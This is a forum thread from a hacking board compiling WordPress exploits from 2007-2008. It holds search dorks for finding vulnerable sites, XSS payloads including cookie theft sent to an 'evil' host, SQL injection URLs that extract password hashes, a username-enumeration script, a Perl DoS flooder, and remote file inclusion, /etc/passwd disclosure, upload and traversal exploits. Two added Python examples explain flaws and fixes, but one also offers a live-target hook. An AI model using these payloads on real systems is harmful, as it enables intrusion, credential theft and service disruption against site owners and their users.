ANTICHAT Forum

ANTICHAT Forum (https://forum.antichat.xyz/index.php)
-   Scripts/CMF/CMS (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ WordPress vulnerability overview ] (https://forum.antichat.xyz/showthread.php?t=50572)

ettee 05.10.2007 19:34

[ WordPress vulnerability overview ]
 
Vulnerabilities:

Wordpress Multiple Versions Pwnpress Exploitation Toolkit (0.2pub)

Wordpress plugin myflash <= 1.00 (wppath) RFI Vulnerability

Enigma 2 WordPress Bridge (boarddir) Remote File Include Vulnerability

1.4*
Wordpress plugin wordTube <= 1.43 (wpPATH) RFI Vulnerability

Wordpress plugin wp-Table <= 1.43 (inc_dir) RFI Vulnerability

Wordpress Plugin myGallery <= 1.4b4 Remote File Inclusion Vulnerability


1.5.1.*
Wordpress <= 1.5.1.3 Remote Code Execution eXploit (metasploit)

Wordpress <= 1.5.1.3 Remote Code Execution 0-Day Exploit

Wordpress <= 1.5.1.2 xmlrpc Interface SQL Injection Exploit

WordPress <= 1.5.1.1 SQL Injection Exploit

WordPress <= 1.5.1.1 "add new admin" SQL Injection Exploit

2.0.*
WordPress <= 2.0.2 (cache) Remote Shell Injection Exploit

Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit

Wordpress 2.0.5 Trackback UTF-7 Remote SQL Injection Exploit

2.1.*
Wordpress 2.1.2 (xmlrpc) Remote SQL Injection Exploit

Wordpress 2.1.3 admin-ajax.php SQL Injection Blind Fishing Exploit

2.*
Wordpress <= 2.x dictionary & bruteforce attack

WordPress 2.2 (wp-app.php) Arbitrary File Upload Exploit

Wordpress 2.2 (xmlrpc.php) Remote SQL Injection Exploit


Dorks:
Code:

"is proudly powered by WordPress"
intext:"Warning: main" inurl:Wp ext:php
inurl:wp-login.php Register Username Password -echo -trac
inurl:"wp-admin" config -cvs -phpxref
inurl:/comments/feed/rss2/ intext:wordpress.org?v=*
Powered by Wordpress 1.2
intext:"proudly powered by WordPress" filetype:php
intext:"powered by WordPress" filetype:php -dritte-seite
intitle:"WordPress > * > Login form" inurl:"wp-login.php"
ext:php inurl:"wp-login.php" -cvs


Full path disclosure:


WordPress < 1.5.2

Cross-site Scripting:
/wp-login.php?action=login&redirect_to=[XSS]
/wp-admin/templates.php?file=[XSS]
/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=[XSS]
http://www.example.com/wp-admin/edit-comments.php?s=bla&submit=Search&mode=[XSS]
http://www.example.com/wp-admin/templates.php?file=[XSS]
http://www.example.com/wp-admin/link-add.php?linkurl=[XSS]
http://www.example.com/wp-admin/link-add.php?name=[XSS]
http://www.example.com/wp-admin/link-categories.php?cat_id=[XSS]&action=Edit
http://www.example.com/wp-admin/link-manager.php?order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?cat_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_url=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_name=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_description=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rel=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_image=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_rss_uri=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_notes=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&link_id=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&order_by=[XSS]
http://www.example.com/wp-admin/link-manager.php?action=linkedit&cat_id=[XSS]
http://www.example.com/wp-admin/post.php?content=[XSS]
http://www.example.com/wp-admin/moderation.php?action=update&item_approved=[XSS]

SQL injection examples:
http://www.example.com/index.php?m=[SQL]
http://www.example.com/wp-admin/edit.php?m=[SQL]
http://www.example.com/wp-admin/link-categories.php?cat_id=[SQL]&action=Edit
http://www.example.com/index.php?cat=100)%09or%090=0%09or%09(0=1

Tables/Prefix_/Columns:
wp_

Hash algorithms:
md5(password)

WordPress Vulnerability Scanner
Code:

$ perl -x wp-scanner.pl http://testblog/wordpress/

WordPress Scanner starting: David Kierznowski (http://michaeldaw.org)

Using plugins dir: wp-content/plugins
[*] Initial WordPress Enumeration
[*] Finding WordPress Major Version
[*] Testing WordPress Template for XSS

WordPress Basic Results

        wp-commentsrss2.php =>  Version Leak: WordPress 2.1.3
        wp-links-opml.php =>    Version Leak: WordPress 2.1.3
        wp-major-ver => Version 2.1
        wp-rdf.php =>  Version Leak: WordPress 2.1.3
        wp-rss.php =>  Version Leak: WordPress 2.1.3
        wp-rss2.php =>  Version Leak: WordPress 2.1.3
        wp-server =>    Apache/1.3.34 (Unix) PHP/4.4.4 mod_ssl/2.8.25 OpenSSL/0.9.8a
        wp-style-dir => http://testblog/wordpress/wp-content/themes/time1-theme-10/style.css
        wp-title => Test Blog
        wp-version =>  WordPress 2.1.3
        x-Pingback =>  http://testblog/wordpress/xmlrpc.php

WordPress Plugins Found

        wp-plugins[0]    => Akismet


+toxa+ 05.10.2007 19:39

WordPress Scanner v1.3b BETA
 
http://blogsecurity.net/cgi-bin/wp-scanner.cgi
http://blogsecurity.net/projects/wp-scanner.zip

+toxa+ 05.10.2007 19:48

WordPress <=2.0.4 XSS
 
simple PoC:
HTML code:

<html>
<head></head>
<body>

<form method="post" action="http://target/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />

<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />

</form>
<script>document.forms[0].submit()</script>
</body>
</html>

cookie theft PoC:

HTML code:

<html>
<head></head>
<body>

<form method="post"
action="http://target/wordpress/wp-register.php#location='http://evil/?'+document.cookie"
>

<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="anyusername" />
<input type="hidden" name="user_email" id="user_email"
value='"><script>eval(location.hash.substr(1))</script>' />


</form>
<script>document.forms[0].submit()</script>
</body>
</html>

unrestricted script insertion from a third-party site (we prove we can inject ANY JS):

HTML code:

<html>
<head></head>
<body>

<form method="post" action="http://victim/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login" value="test" />
<input type="hidden" name="user_email" id="user_email"
value='"><SCRIPT src=http://evil/jsfile></SCRIPT>'>

</form>
<script>document.forms[0].submit()</script>
</body>
</html>


Solide Snake 05.10.2007 19:51

June 7, 2007
Software: WordPress 2.2, possibly earlier versions

Severity: Medium

Exploit available: Yes

Description:
The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database.

The vulnerability is caused by insufficient sanitisation of input passed to the "wp.suggestCategories" method in xmlrpc.php. A remote user can execute arbitrary SQL commands in the application's database with a specially crafted request.

To exploit it, user registration must be enabled on the site; the request is sent as POST only.
Example request:
HTML code:

<methodCall>
<methodName>wp.suggestCategories</methodName>
<params>
<param><value>1</value></param>
<param><value>login here</value></param>
<param><value>password here</value></param>
<param><value>1</value></param>
<param><value>0 UNION SELECT USER()</value></param>
</params>
</methodCall>


+toxa+ 05.10.2007 19:54

Wordpress 2.2 Username Enumeration
 
Code:

#!/bin/bash

# this script attacks a low-risk username enumeration vul
# on Wordpress 2.2 login page. Previous versions are
# possibly affected as well
#
# Note: you need curl [http://curl.haxx.se/download.html]
# installed on your system for this script to work.
#
# Adrian Pastor - http://www.gnucitizen.org/

if [ $# -ne 2 ]
then
        echo "need two parameters! correct syntax is:"
        echo "$0 <ip-or-hostname> <wordlist-filename>"
        exit 1
fi

for U in `cat "$2"`
do
        #echo $U

        # a valid username with a wrong password makes wp-login.php answer
        # "Incorrect password"; an unknown username gets a different error
        if curl -s -d "log=$U&pwd=mypassword&wp-submit=Login+%C2%BB&redirect_to=" \
                --url "http://$1/wordpress/wp-login.php" | grep -q 'Incorrect password'
        then
                echo "username found!: $U"   # print username found on screen
                echo "$U" >> "$0.found"      # save results to a file named after the script plus .found
        fi
done

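The oracle the script above relies on, and the fix for it, in one offline example. This is an added example, not code from the original post or from WordPress: it classifies a wp-login.php response by its error text, runs the wordlist against a constructed stand-in for a WordPress 2.2 site (no network), and then against the same site with a single generic error message. The "Invalid username" wording for the unknown-user case, the fake account names and the hardened message text are assumptions for the example; only "Incorrect password" comes from the post.

```python
from typing import Callable, Iterable, List

# Markers in the wp-login.php response body. "Incorrect password" is what the
# bash script greps for; the unknown-user wording is an assumption made here
# only so the two cases differ, as they do on the vulnerable page.
VALID_USER_MARKER = "Incorrect password"
UNKNOWN_USER_MARKER = "Invalid username"
# Hardened wording: one message for both cases, so the oracle has nothing to read.
GENERIC_ERROR = "Incorrect username or password."


def classify_login_response(body: str) -> str:
    """Map a login response to 'valid' (user exists), 'unknown', or 'ambiguous'."""
    if VALID_USER_MARKER in body:
        return "valid"
    if UNKNOWN_USER_MARKER in body:
        return "unknown"
    return "ambiguous"


def enumerate_users(candidates: Iterable[str],
                    post_login: Callable[[str, str], str]) -> List[str]:
    """Try each candidate with a throwaway password; keep those the oracle confirms."""
    return [u for u in candidates
            if classify_login_response(post_login(u, "mypassword")) == "valid"]


# Constructed stand-in for a WordPress 2.2 site: two real accounts, no HTTP.
_FAKE_ACCOUNTS = {"admin", "editor"}


def leaky_post_login(user: str, password: str) -> str:
    """Vulnerable behaviour: the error text depends on whether the user exists."""
    msg = "Incorrect password." if user in _FAKE_ACCOUNTS else "Invalid username."
    return f'<div id="login_error"><strong>Error</strong>: {msg}</div>'


def hardened_post_login(user: str, password: str) -> str:
    """Same site after the fix: identical response for both cases."""
    return f'<div id="login_error"><strong>Error</strong>: {GENERIC_ERROR}</div>'


def live_post_login(host: str, path: str = "/wordpress/") -> Callable[[str, str], str]:
    """Real HTTP oracle against a host you are authorised to test (not used offline).
    Form field names match the POST body in the bash script above."""
    import urllib.parse
    import urllib.request

    def post(user: str, password: str) -> str:
        data = urllib.parse.urlencode({"log": user, "pwd": password,
                                       "wp-submit": "Login \u00bb",
                                       "redirect_to": ""}).encode()
        req = urllib.request.Request(f"http://{host}{path}wp-login.php", data=data)
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", "replace")
    return post


if __name__ == "__main__":
    wordlist = ["admin", "bob", "editor", "guest"]
    print("leaky site   :", enumerate_users(wordlist, leaky_post_login))    # ['admin', 'editor']
    print("hardened site:", enumerate_users(wordlist, hardened_post_login)) # []
```

Swap `leaky_post_login` for `live_post_login("host")` to run the same loop against a real target; the classifier is the only part that depends on the page's wording, so it is the one piece to adjust per version.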

+toxa+ 05.10.2007 20:20

WordPress Security Whitepaper
 
Quote:

* Table of Contents
* Introduction
* Installing WordPress
o Accessing your WordPress tables
o Changing your WordPress Table Prefix
o Before Installation
o Manually Change
o Through WP Prefix Table Changer
* Preparing the Blog
o Changing your Admin Username
o Create a new limited access user
* Hardening your WP Install
o Restricting wp-content & wp-includes
o Restricting wp-admin
o Block all except your IP
o Password Required - .htpasswd
o The .htaccess file
o The .htpasswd file
* MUSTHAVE Plugins
o WPIDS - Detect Intrusions
o WordPress Plugin Tracker – Are you updated?
o WordPress Online Security Scanner
http://blogsecurity.net/projects/secure-wp-whitepaper.pdf

&&

Writing Secure WordPress Plugins
http://michaeldaw.org/papers/securing_wp_plugins/

ettee 05.10.2007 20:26

WordPress PHP_Self Cross-Site Scripting Vulnerability
Code:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="es" lang="es">       
<head>
        <title>Wordpress XSS PoC</title>
</head>
<body id="main">

        <form action="http://localhost/wp/wp-admin/theme-editor.php/'><img src=a onerror=document.forms[0].submit()><.php" method="post">
                <p>
                        <textarea name="newcontent" rows="8" cols="40">&lt;?php echo "Owned! " . date('F d, Y'); ?&gt;</textarea>
                </p>
                <p>
                        <input type="hidden" name="action" value="update" />
                        <input type="hidden" name="file" value="wp-content/themes/default/index.php" />               
                </p>
        </form>       
        <script type="text/javascript">
        // <![CDATA[
                document.forms[0].submit();
        // ]]>
        </script>
</body>
</html>

Vulnerable URI:
Code:

/wp-admin/plugins.php?page=akismet-key-config
Vulnerable Post variable:
Code:

_wp_http_referer="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,41))</script>"
by 0x000000

Fugitif 05.10.2007 20:28

Wordpress Plugin Scanner
 
http://img294.imageshack.us/img294/4733/pspo8.jpg


http://www.blogeek.net/2007/09/26/wo...lugin-scanner/

Solide Snake 06.10.2007 08:53

Password brute-forcing for WordPress 2.x in Python: here.

ettee 06.10.2007 16:38

runPHP Plugin
/wp-admin/post.php?action=edit&post=1/*SQLINJECTION*/%20AND%201'=0


WP <2.3
http://target/wp-admin/edit-post-rows.php?posts_columns[]=<script>alert(1)</script>


WordPress 2.0.1 Remote DoS Exploit
Code:

#!perl
#Greets to all omega-team members + h4cky0u[h4cky0u.org], lessMX6 and all dudes from #DevilDev ;)
#The exploit was tested on 10 machines but not all got flooded.Only 6/10 got crashed
use Socket;
if (@ARGV < 2) { &usage; }
$rand=rand(10);
$host = $ARGV[0];
$dir = $ARGV[1];
$host =~ s/^http:\/\///; #no http://
for ($i=0; $i<9999999999999999999999999999999999999999999999999999999999999999999999; $i++) #0_o :)
{
$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
              "Accept: */*\r\n".
              "Accept-Language: en-gb\r\n".
              "Content-Type: application/x-www-form-urlencoded\r\n".
              "Accept-Encoding: gzip, deflate\r\n".
              "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
              "Host: $host\r\n".
              "Content-Length: $len\r\n".
              "Connection: Keep-Alive\r\n".
              "Cache-Control: no-cache\r\n\r\n".
 "$data";
    my $port = "80";
    my $proto = getprotobyname('tcp');
    socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
    connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
    send(SOCKET,"$foo", 0);
    close(SOCKET); # release the descriptor, otherwise the loop stalls once the fd limit is hit
    syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system("ping $host"); # double quotes so $host is interpolated
sub usage {
print "\n\t(W)ordpress 2.0.1 (R)emote (D)oS (E)xploit (B)y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 <host> </dir/>\n";
print "\tex: $0 127.0.0.1 /wordpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};


The_HuliGun 21.10.2007 16:45

Path disclosure
Code:

http://[target]/[path]/wp-content/plugins/akismet/akismet.php

Solide Snake 28.10.2007 03:32

Simple Forum (for WordPress) sql-inject exploit (public version)

Fugitif 01.11.2007 19:21

WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability

Code:

#Author: S.W.A.T.


#cont@ct: svvateam@yahoo.com

--------------------------------------------------------------------------------


------------------------- -------------------------------------------------------

Application :  BackUpWordPress 0.4.2b

Download    :  http://wordpress.designpraxis.at/download/backupwordpress.zip

--------------------------------------------------------------------------------
Vuln :

require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";

--------------------------------------------------------------------------------

Exploit:

http://[target]/[path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?

http://[target]/[path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?

http://[target]/[path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?

http://[target]/[path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?

& other Files & Folders In The [Archive] Folder

--------------------------------------------------------------------------------

Dork:

"inurl:/plugins/BackUp"


Mirror:

http://www.milw0rm.com/exploits/4593

Fugitif 05.12.2007 21:23

Sql Injection in wordpress 2.3.1
 


Code:

Author : Beenu Arora

Mail : beenudel1986 (at) gmail (dot) com [email concealed]

Application : WordPress (2.3.1)

Homepage: http://wordpress.org/

~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

Parameter : p

POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where/**/user_id=1/*


Code:

http://www.securityfocus.com/archive/1/484608

Solide Snake 11.12.2007 20:29

Wordpress toolkit exploit

Fugitif 11.12.2007 21:47

WordPress Charset SQL Injection Vulnerability

Insufficient escaping when the database uses the GBK charset leads to SQL injection.
( Write-up of the vulnerability on Antichat: https://forum.antichat.ru/thread62109.html )


Exploit:
http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

_http://ilia.ws/archives/103-mysql_real_escape_string-versus-Prepared-Statements.html

Code:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=== WordPress Charset SQL Injection Vulnerability ===

Release date: 2007-12-10
Last modified: 2007-12-10
Source: Abel Cheung
Affected version: WordPress escape($gpc);
}


  Finally, escape() method belongs to wp-includes/wp-db.php:

function escape($string) {
  return addslashes( $string ); // Disable rest for now, causing problems
  ......
}


3. Proof of concept

  a. After WordPress installation, modify wp-config.php to make sure
    it uses certain character set for database connection (Big5 can
also be used):
    define('DB_CHARSET', 'GBK');

  b. http://localhost/wordpress/index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23


4. Workaround

  Note: This vulnerability only exists for database queries performed
  using certain character sets. For databases created in most other
  character sets no remedy is needed.

  a. It is recommended to convert WordPress database to use character sets not
    vulnerable to such SQL exploit. One such charset is UTF-8, which does not
    use backslash ('\') as part of character and it supports various languages.
  b. Alternatively, edit WordPress theme to remove search capability.


-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
Comment: http://firegpg.tuxfamily.org

iD8DBQFHXVXGQVLh8cZxhv8RAgjgAKDwvrrO6hJbnV0/VFah5W+i8grYcwCgzyCT
5RKJG+zo/mktmRU3v1IfmXE=
=2okr
-----END PGP SIGNATURE-----
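Why the `%b3%27` prefix in the PoC above gets past `addslashes()`, shown in code. This is an added example, not part of the advisory or of WordPress: it emulates PHP's charset-blind `addslashes()` on raw bytes, decodes the result the way a MySQL connection set to GBK (and, for contrast, UTF-8) would, and checks whether a bare quote survives. The `charset_aware_escape` function is the fix the advisory's workaround hints at (escape per character, after validating the byte string in the connection charset), not WordPress's own code. The `0xB3` byte is taken from the PoC URL; the rest of the sample input is constructed.

```python
from typing import Dict

# Per-character escaping table, the same substitutions addslashes() makes (NUL becomes \0).
_ESCAPES = {"'": "\\'", '"': '\\"', "\\": "\\\\", "\x00": "\\0"}


def addslashes(raw: bytes) -> bytes:
    """Byte-wise emulation of PHP addslashes(): a backslash before ' " \\ and NUL.
    It knows nothing about the connection charset, which is the root cause here."""
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def quote_unescaped_after_decode(escaped: bytes, charset: str) -> bool:
    """Decode the escaped bytes as MySQL would for the given connection charset
    and report whether a single quote survives with no backslash in front of it,
    i.e. whether the string literal can still be closed by the attacker."""
    text = escaped.decode(charset, errors="replace")
    for i, ch in enumerate(text):
        if ch == "'" and (i == 0 or text[i - 1] != "\\"):
            return True
    return False


def charset_aware_escape(raw: bytes, charset: str) -> bytes:
    """Escape at the character level: decode strictly first, so a dangling lead
    byte is rejected instead of being left to swallow the backslash. This is what
    mysql_real_escape_string does when it knows the connection charset; a
    parameterised query avoids the question entirely."""
    text = raw.decode(charset, errors="strict")   # raises on a truncated multibyte char
    return "".join(_ESCAPES.get(ch, ch) for ch in text).encode(charset)


def strict_escape_rejects(raw: bytes, charset: str) -> bool:
    """True when charset_aware_escape refuses the input as malformed."""
    try:
        charset_aware_escape(raw, charset)
    except UnicodeDecodeError:
        return True
    return False


def demo() -> Dict[str, bool]:
    # Constructed input: the %b3%27 prefix of the PoC URL, byte 0xB3 then a quote.
    payload = b"\xb3'"
    naive = addslashes(payload)   # becomes 0xB3 0x5C 0x27
    return {
        # GBK: 0xB3 0x5C is one two-byte character, so the quote is left bare.
        "gbk_bypassed": quote_unescaped_after_decode(naive, "gbk"),
        # UTF-8: a lone 0xB3 is not a character, the backslash stays in front of the quote.
        "utf8_bypassed": quote_unescaped_after_decode(naive, "utf-8"),
    }


if __name__ == "__main__":
    print(demo())                                                    # {'gbk_bypassed': True, 'utf8_bypassed': False}
    print(charset_aware_escape(b"abc'", "gbk"))                      # b"abc\\'"
    print("malformed GBK rejected:", strict_escape_rejects(b"\xb3'", "gbk"))  # True
```

The same trick works for any charset whose trail bytes include `0x5C` (Big5, as the advisory notes, and SJIS); it does not work for UTF-8, which is why converting the database is the recommended remedy.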


Fugitif 16.12.2007 01:49

Wordpress 2.3.1 - Broken Access Control is_admin()
 
Obtaining admin privileges without the password.

How to use: _http://forum.antichat.ru/showpost.php?p=729009&postcount=63

Code:

By Michael Brooks

Vulnerability:Broken Access Control

Homepage:http://wordpress.org/download

Software: Wordpress

Version affected:2.3.1 (Latest at the time of writing)



The impact of the flaw is that an attacker can read posts while they are still drafts. This is an ability that only the administrator should have. Imagine a stranger being able to read the news before it is published. Or perhaps a spam-blog harvesting posts before they are published.



This flaw is because Wordpress is trusting the $_SERVER['REQUEST_URI'] global variable. Manipulation of $_SERVER['REQUEST_URI'] has led to many xss flaws. Although an attacker shouldn't be able to control all $_SERVER variables, none of them should be trusted.



exploit:

http://localhost/wordpress/'wp-admin/


This will cause both $_SERVER['REQUEST_URI'] and $_SERVER['PHP_SELF'] to contain the value:
http://localhost/wordpress/'wp-admin/


Vulnerable function:

line 34, in ./wp-includes/query.php.

function is_admin () {

global $wp_query;



return ($wp_query->is_admin || (stripos($_SERVER['REQUEST_URI'], 'wp-admin/') !== false));

}

The same flaw is duplicated again on line 645 of the same file.



This url: http://localhost/wordpress/'wp-admin/
will cause the is_admin() function to return true. This flaw works regardless of register_globals or magic_quotes_gpc. The attack fails when search engine friendly urls are turned on in wordpress, however this option is turned off by default. Turning search engine friendly urls on is a workaround until a patch is created.


+toxa+ 25.12.2007 21:45

Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
 
Code:

Wordpress Plugin PictPress <= release0.91 Remote File Disclosure Vulnerability
D.Script : http://downloads.wordpress.org/plugin/pictpress.release-0.91.zip
Vuln Code :
In Line 5,6,7,8 :
    $path = $_GET['path'];
    $size = $_GET['size'];
    $base = dirname(__FILE__) . "/..";
    $cache = "$base/cache/$size/$path";
In Line 22 :
    readfile($cache);
POC :
    /wp-content/plugins/pictpress/resize.php?size=../../../../../../../../../../&path=/etc/passwd%00

# milw0rm.com [2007-12-05]


+toxa+ 25.12.2007 21:52

XSS in WP-ContactForm <= 2.0.7
 
For attacking admin only (at options page):

1
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_email" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>

2
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_subject" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>

3
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>

4
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value='"><script>alert(document.cookie)</script>' />
</form>
</body>
</html>

=====
For attacking every user of the site (at contact page):

5
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_question" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>

HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<body>
<iframe src="http://site/contact/" width="0" height="0"></iframe>
</body>
</html>

======
For attacking every user of the site at contact page (and admin at options page):

6
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_success_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>

7
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="</textarea><script>alert(document.cookie)</script>" />
</form>
</body>
</html>

======
For attacking every user of the site (at contact page):

8
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_answer" value="4" />
<input type="hidden" name="wpcf_success_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>

HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_your_name" value="test" />
<input type="hidden" name="wpcf_email" value="test@test.test" />
<input type="hidden" name="wpcf_response" value="4" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>

9
HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/wp-admin/admin.php?page=wp-contact-form/options-contactform.php" method="post">
<input type="hidden" name="stage" value="process" />
<input type="hidden" name="wpcf_error_msg" value="<script>alert(document.cookie)</script>" />
</form>
</body>
</html>

HTML code:

<html>
<head>
<title>MoBiC-29 Bonus: XSS in WP-ContactForm exploit (C) 2007 MustLive. http://websecurity.com.ua</title>
</head>
<!-- <body onLoad="document.hack.submit()"> -->
<body>
<form name="hack" action="http://site/contact/" method="post">
<input type="hidden" name="wpcf_stage" value="process" />
<input type="hidden" name="wpcf_msg" value="XSS" />
</form>
</body>
</html>


+toxa+ 03.01.2008 16:43

directory traversal vulnerabilities in WP 2.0.11 (win only)
 
PHP code:

function validate_file(..)
    if (false !== strpos($file, './'))

Code:

Proof of concept:
http://site/wp-admin/index.php?page=\..\..\.htaccess


Solide Snake 07.01.2008 11:35

Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability
 
Wordpress Plugin Wp-FileManager 1.2 Remote Upload Vulnerability

The file manager is located here:

Code:

http://[TARGET]/[path_wordpress]/wp-content/plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php
After uploading, you will find the script in this directory:

Code:

http://[TARGET]/[path_wordpress]/uploaded/[evil].(php)
Search query:

Code:

plugins/wp-filemanager/
inurl:/wp-filemanager/


ettee 08.01.2008 00:29

Code:

/wp-admin/index.php?page=\..\..\file.php
/wp-admin/index.php?page=\..\..\.htaccess
